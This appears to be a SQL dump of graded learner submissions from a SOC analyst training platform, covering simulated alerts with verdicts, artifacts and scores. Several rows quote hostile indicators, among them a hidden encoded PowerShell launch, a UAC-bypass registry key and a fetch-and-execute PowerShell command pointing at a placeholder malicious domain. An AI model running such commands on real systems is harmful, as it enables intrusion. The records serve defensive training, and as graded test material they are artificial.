(527, 283, 234, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"The log shows the execution of the process (process_execution) from host 10.0.0.20 to host 10.0.0.25. According to the incident description, the action was performed using the PsExec utility. The use of PsExec to connect to remote nodes within the network is a typical sign of Horizontal Movement, which is often used by attackers after the initial hacking. Even when using the admin_user account, such activity requires immediate investigation, as it may indicate a compromise of the administrator\'s credentials.\",\"artifacts\":\"10.0.0.20, 10.0.0.25, PSExec\",\"analysis_answers\":{\"action_taken\":\"The log shows the execution of the process (process_execution) from host 10.0.0.20 to host 10.0.0.25. According to the incident description, the action was performed using the PsExec utility. The use of PsExec to connect to remote nodes within the network is a typical sign of Horizontal Movement, which is often used by attackers after the initial hacking. Even when using the admin_user account, such activity requires immediate investigation, as it may indicate a compromise of the administrator\'s credentials.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-12T12:25:44.029Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-12 15:15:32', '2026-03-12 12:08:32', '2026-03-12 12:26:00', 0, NULL),
(528, 42, 750, 'graded', 70, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (0/1)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-198.51.100.23\",\"ip-192.168.1.20\",\"artifact_2\",\"artifact_3\"],\"selectedActions\":[],\"verdict\":\"false_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 12/03/2026, 13:15:12\\nALERT: Suspicious Email Detected - Potential False Positive\\nVERDICT: FALSE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 198.51.100.23\\n- [IP] 192.168.1.20\\n- [URL] https://example-trusted-site.com/document\\n- [EMAIL] trusted.source@example.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (0)\\n------------------------------\\n(No active containment measures)\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-12T12:15:23.959Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (0/1)\",\"missed_items\":[\"close_alert\"],\"strengths\":\"Needs improvement\"}', '2026-03-12 15:13:42', '2026-03-12 12:08:42', '2026-03-12 12:15:23', 0, NULL),
(529, 283, 235, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"False Positive\",\"executive_summary\":\"A surge in network traffic was recorded on the data-server under the service_account account.\\nThis indicates an automated process (such as data backup or synchronization), which is a normal activity for this type of server.\\nThe priority of the incident is indicated as Low, which does not correspond to the criticality of a real data leak (Exfiltration).\\nNo additional indicators of compromise (suspicious processes, abnormal time) were found.\",\"artifacts\":\"192.168.1.10, 203.0.113.100, service_account\",\"analysis_answers\":{\"action_taken\":\"A surge in network traffic was recorded on the data-server under the service_account account.\\nThis indicates an automated process (such as data backup or synchronization), which is a normal activity for this type of server.\\nThe priority of the incident is indicated as Low, which does not correspond to the criticality of a real data leak (Exfiltration).\\nNo additional indicators of compromise (suspicious processes, abnormal time) were found.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-12T12:35:34.417Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-12 15:36:16', '2026-03-12 12:26:16', '2026-03-12 12:36:00', 0, NULL),
(530, 283, 236, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"There were 150 failed login attempts (attempt count: 150) from one IP address (192.0.2.45) to SSH port (22) under the admin account.\\nSuch a number of unsuccessful attempts in a short time is a characteristic feature of an automated Brute Force attack (password brute force).\\nThe attacker\'s goal was to gain unauthorized access to the internal system. The \\\"Brute Force Detection Policy\\\" protection rule has been activated.\",\"artifacts\":\"192.0.2.45, port 22, admin\",\"analysis_answers\":{\"action_taken\":\"There were 150 failed login attempts (attempt count: 150) from one IP address (192.0.2.45) to SSH port (22) under the admin account.\\nSuch a number of unsuccessful attempts in a short time is a characteristic feature of an automated Brute Force attack (password brute force).\\nThe attacker\'s goal was to gain unauthorized access to the internal system. The \\\"Brute Force Detection Policy\\\" protection rule has been activated.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-12T12:51:07.762Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-12 15:41:07', '2026-03-12 12:36:07', '2026-03-12 12:52:00', 0, NULL),
(531, 283, 242, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"Обнаружен запуск PowerShell с признаками вредоносной активности:\\nИспользование ключей скрытности: -NoP, -NonI, -W Hidden.\\nПередача закодированной команды (Base64) через параметр -E, что указывает на обфускацию кода.\\nРодительский процесс explorer.exe suggests запуск через действие пользователя (открытие файла).\\nЗафиксирована модификация реестра в ключе HKCU\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command, что является известным методом обхода UAC (повышения привилегий).\\nНаличие сетевой активности на порт 80.\\nСовокупность этих факторов однозначно указывает на выполнение вредоносного скрипта.\",\"artifacts\":\"powershell.exe -E JABzAHQAcg..., HKCU\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command, 2B2B6D120897FBB5783C3F8DCF57DBBA\",\"analysis_answers\":{\"action_taken\":\"Обнаружен запуск PowerShell с признаками вредоносной активности:\\nИспользование ключей скрытности: -NoP, -NonI, -W Hidden.\\nПередача закодированной команды (Base64) через параметр -E, что указывает на обфускацию кода.\\nРодительский процесс explorer.exe suggests запуск через действие пользователя (открытие файла).\\nЗафиксирована модификация реестра в ключе HKCU\\\\Software\\\\Classes\\\\ms-settings\\\\shell\\\\open\\\\command, что является известным методом обхода UAC (повышения привилегий).\\nНаличие сетевой активности на порт 80.\\nСовокупность этих факторов однозначно указывает на выполнение вредоносного скрипта.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-12T13:10:21.064Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-12 16:05:43', '2026-03-12 12:57:43', '2026-03-12 13:11:00', 0, NULL),
(532, 283, 243, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"There were 45 unsuccessful attempts to log in using the RDP protocol from the 192.168.1.25 host to the 10.0.0.4 server.\\nThe key indicator of the attack is the search for various accounts (admin, guest, user1), which is typical for automated brute force, and not for user error.\",\"artifacts\":\"192.168.1.25, 10.0.0.4, RDP, admin/guest/user1\",\"analysis_answers\":{\"action_taken\":\"There were 45 unsuccessful attempts to log in using the RDP protocol from the 192.168.1.25 host to the 10.0.0.4 server.\\nThe key indicator of the attack is the search for various accounts (admin, guest, user1), which is typical for automated brute force, and not for user error.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-12T13:23:14.060Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-12 16:20:28', '2026-03-12 13:11:28', '2026-03-12 13:24:00', 0, NULL),
(533, 290, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-12 13:52:27', '2026-03-12 13:52:27', 0, NULL),
(534, 290, 384, 'graded', 85, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.25\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/12/2026, 8:08:24 AM\\nALERT: Spear Phishing Email Detected [OP: Operation Gothic Panda]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.25\\n- [EMAIL] john.doe@fakecompany.com\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-12T15:08:59.097Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/4)\",\"missed_items\":[\"isolate_host\",\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', '2026-03-12 17:31:23', '2026-03-12 14:25:23', '2026-03-12 15:08:59', 0, NULL),
(535, 290, 384, 'investigating', NULL, NULL, NULL, NULL, '2026-03-12 17:30:23', '2026-03-12 14:25:23', '2026-03-12 14:25:23', 0, NULL),
(536, 34, 234, 'investigating', NULL, NULL, NULL, NULL, '2026-03-12 17:48:47', '2026-03-12 14:38:47', '2026-03-12 14:38:47', 0, NULL),
(537, 287, 268, 'investigating', NULL, NULL, NULL, NULL, NULL, '2026-03-12 16:02:59', '2026-03-12 16:02:59', 0, NULL),
(538, 34, 233, 'investigating', NULL, NULL, NULL, NULL, '2026-03-12 21:07:09', '2026-03-12 18:01:09', '2026-03-12 18:01:09', 0, NULL),
(539, 283, 1466, 'graded', 82, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/5)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.105\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"block_ip\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 12.03.2026, 23:08:49\\nALERT: Initial Access via Spear Phishing [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.105\\n- [HASH] b1946ac92492d2347c6235b4d2611184\\n- [DOMAIN] update-portal.example.com\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (2)\\n------------------------------\\n- Block IP/Domain\\n- Block File Hash\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-12T20:09:56.045Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (2/5)\",\"missed_items\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', '2026-03-12 23:10:18', '2026-03-12 20:02:18', '2026-03-12 20:09:56', 0, NULL),
(540, 283, 1467, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.15\",\"hash-d41d8cd9\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"block_ip\",\"block_hash\",\"isolate_host\",\"collect_forensics\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 12.03.2026, 23:15:00\\nALERT: Execution of Malicious Payload [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.15\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] payload.exe\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-12T20:15:07.202Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-12 20:09:56', '2026-03-12 20:15:07', 0, NULL),
(541, 283, 1468, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-10.0.0.5\",\"hash-d41d8cd9\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 12.03.2026, 23:17:56\\nALERT: Persistence through Backdoor Installation [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 10.0.0.5\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] backdoor_installer.exe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-12T20:17:58.561Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-12 20:15:07', '2026-03-12 20:17:58', 0, NULL),
(542, 283, 1469, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-10.0.5.12\",\"ip-192.168.1.50\",\"hash-d41d8cd9\",\"domain-CORP\",\"artifact_3\"],\"selectedActions\":[\"collect_forensics\",\"block_hash\",\"isolate_host\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 12.03.2026, 23:19:53\\nALERT: Lateral Movement to Wiretap Systems [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 10.0.5.12\\n- [IP] 192.168.1.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [DOMAIN] CORP\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-12T20:19:56.149Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-12 20:17:58', '2026-03-12 20:19:56', 0, NULL),
(543, 283, 1470, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.10\",\"ip-203.0.113.45\",\"hash-5d41402a\",\"artifact_3\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"escalate\",\"reset_credentials\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 12.03.2026, 23:20:52\\nALERT: Exfiltration of Sensitive Communications [OP: Operation Salt Typhoon]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.10\\n- [IP] 203.0.113.45\\n- [HASH] 5d41402abc4b2a76b9719d911017c592\\n- [FILENAME] wiretap_data.zip\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-12T20:20:53.053Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-12 20:19:56', '2026-03-12 20:20:53', 0, NULL),
(544, 283, 237, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"Activity characteristic of Fileless Malware (fileless virus) has been detected:\\nUsing the IEX(...).DownloadString() command to download and immediately execute a script from the Internet directly in RAM, without saving it to disk. Hidden launch with the -nop and -w hidden flags. Downloading code from a suspicious external resource (http://malicious.example.com/script.ps1 ).\\nThe parent process explorer.exe indicates that the attack started with a user action (for example, opening a phishing document).\",\"artifacts\":\"powershell.exe -c IEX(New-Object Net.WebClient)..., http://malicious.example.com/script.ps1, 192.0.2.123\",\"analysis_answers\":{\"action_taken\":\"Activity characteristic of Fileless Malware (fileless virus) has been detected:\\nUsing the IEX(...).DownloadString() command to download and immediately execute a script from the Internet directly in RAM, without saving it to disk. Hidden launch with the -nop and -w hidden flags. Downloading code from a suspicious external resource (http://malicious.example.com/script.ps1 ).\\nThe parent process explorer.exe indicates that the attack started with a user action (for example, opening a phishing document).\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-12T21:46:42.285Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-13 00:51:28', '2026-03-12 21:44:28', '2026-03-12 21:48:00', 0, NULL),
(545, 225, 237, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"The explorer.exe ran a powershell command to download malicious file from a malicious website.\",\"artifacts\":\"192.0.2.123, b1946ac92492d2347c6235b4d2611184, http://malicious.example.com/script.ps1\",\"analysis_answers\":{\"action_taken\":\"The explorer.exe ran a powershell command to download malicious file from a malicious website.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-13T02:58:27.960Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-13 06:01:00', '2026-03-13 02:53:00', '2026-03-13 03:00:00', 0, NULL),
(546, 225, 233, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"The email sender is suspicious and the url is using HTTP that uses port 80. HTTP is not secured and the credentials will show up not encrypted.\",\"artifacts\":\"198.51.100.22, http://secure-bank.com/login\",\"analysis_answers\":{\"action_taken\":\"The email sender is suspicious and the url is using HTTP that uses port 80. HTTP is not secured and the credentials will show up not encrypted.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-13T03:03:30.586Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-13 06:05:04', '2026-03-13 03:00:04', '2026-03-13 03:04:00', 0, NULL),
(547, 225, 234, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"False Positive\",\"executive_summary\":\"Both IPs are internal and the user running the process execution is an admin. No suspicious event indicates malicious intent.\",\"artifacts\":\"10.0.0.20, 10.0.0.25, admin_user, server-02\",\"analysis_answers\":{\"action_taken\":\"Both IPs are internal and the user running the process execution is an admin. No suspicious event indicates malicious intent.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-13T03:30:44.532Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-13 06:18:04', '2026-03-13 03:08:04', '2026-03-13 03:31:00', 0, NULL),
(548, 225, 235, 'graded', 100, 'Legacy investigation (V1) complete. Transitioning to Playbook System (V2).', '{\"verdict\":\"True Positive\",\"executive_summary\":\"The internal IP address is connecting to a suspicious external IP address. The hostname data-server connecting to IP address 203.0.113.100 is an unusual activity and this should be further investigated.\",\"artifacts\":\"192.168.1.10, 203.0.113.100\",\"analysis_answers\":{\"action_taken\":\"The internal IP address is connecting to a suspicious external IP address. The hostname data-server connecting to IP address 203.0.113.100 is an unusual activity and this should be further investigated.\",\"conclusion\":\"\"},\"submitted_at\":\"2026-03-15T10:40:40.813Z\"}', '{\"verdict_correctness\":\"N/A\",\"key_findings\":\"Legacy Format\",\"missed_items\":[],\"strengths\":\"Completed\"}', '2026-03-13 06:39:07', '2026-03-13 03:31:07', '2026-03-15 10:41:00', 0, NULL),
(549, 42, 237, 'investigating', NULL, NULL, NULL, NULL, '2026-03-13 13:17:59', '2026-03-13 10:09:59', '2026-03-13 10:09:59', 0, NULL),
(550, 248, 269, 'graded', 93, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-192.168.1.45\",\"ip-203.0.113.50\",\"hash-d41d8cd9\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"block_ip\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/13/2026, 4:40:20 PM\\nALERT: BlackEnergy Malware Execution [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 192.168.1.45\\n- [IP] 203.0.113.50\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [FILENAME] invoice.doc\\n- [USERNAME] jdoe\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (3)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-13T13:40:59.033Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (3/4)\",\"missed_items\":[\"collect_forensics\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-13 13:32:23', '2026-03-13 13:40:59', 0, NULL),
(551, 248, 270, 'graded', 90, 'Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (4/6)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"hash-3fa85f64\",\"artifact_1\",\"artifact_4\",\"artifact_5\"],\"selectedActions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"block_hash\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 14/03/2026, 00:40:15\\nALERT: Persistence Mechanism Established [OP: Operation Iron Grid]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 203.0.113.45\\n- [HASH] 3fa85f64-5717-4562-b3fc-2c963f66afa6\\n- [IP] 10.0.1.15\\n- [FILENAME] C:\\\\Users\\\\compromised_user\\\\AppData\\\\Local\\\\Temp\\\\malicious.exe\\n- [USERNAME] compromised_user\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (4)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-13T21:40:22.436Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Missed response actions (4/6)\",\"missed_items\":[\"collect_forensics\",\"escalate\"],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-13 13:40:59', '2026-03-13 21:40:22', 0, NULL),
(552, 232, 1443, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-172.217.18.110\",\"ip-10.0.0.15\",\"hash-d41d8cd9\",\"artifact_3\",\"artifact_4\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/13/2026, 9:52:19 PM\\nALERT: Initial Access via Spear Phishing [OP: Operation In(ter)ception]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (5)\\n----------------\\n- [IP] 172.217.18.110\\n- [IP] 10.0.0.15\\n- [HASH] d41d8cd98f00b204e9800998ecf8427e\\n- [EMAIL] j.smith@aerospace-experts.com\\n- [URL] http://compromised-site.com/login\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-13T16:22:18.840Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', '2026-03-13 19:29:38', '2026-03-13 16:21:38', '2026-03-13 16:22:18', 0, NULL),
(553, 232, 1444, 'graded', 100, 'Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)', '{\"playbook_version\":2,\"checkedArtifacts\":[\"ip-203.0.113.45\",\"ip-192.168.1.10\",\"hash-3fa8f88c\",\"artifact_3\"],\"selectedActions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\",\"block_ip\",\"reset_credentials\",\"escalate\"],\"verdict\":\"true_positive\",\"conclusion\":\"INVESTIGATION EXECUTIVE SUMMARY\\n===============================\\nDATE: 3/14/2026, 10:04:03 AM\\nALERT: Execution of Custom Mac Malware [OP: Operation In(ter)ception]\\nVERDICT: TRUE POSITIVE\\n\\nKEY FINDINGS (4)\\n----------------\\n- [IP] 203.0.113.45\\n- [IP] 192.168.1.10\\n- [HASH] 3fa8f88c9b1e237e9b6c8e1e4d9e2f7c\\n- [FILENAME] launchProxy\\n\\nCONTAINMENT PROTOCOLS DEPLOYED (6)\\n------------------------------\\n- Isolate Host\\n- Block IP/Domain\\n- Block File Hash\\n- Reset Credentials\\n- Collect Forensics\\n- Escalate to Tier 3\\n\\nANALYSIS\\n--------\\nInvestigation concluded based on verified telemetry and playbook protocols. All identified threats have been neutralized or escalated as per standard operating procedure.\\n\\nSIGNED: Analyst (Auto-Generated)\",\"submitted_at\":\"2026-03-14T04:34:03.986Z\"}', '{\"verdict_correctness\":\"Correct\",\"key_findings\":\"Verdict is correct (+40). All critical artifacts identified (+30). Response actions correct (+30)\",\"missed_items\":[],\"strengths\":\"Solid analysis\"}', NULL, '2026-03-13 16:22:18', '2026-03-14 04:34:03', 0, NULL),
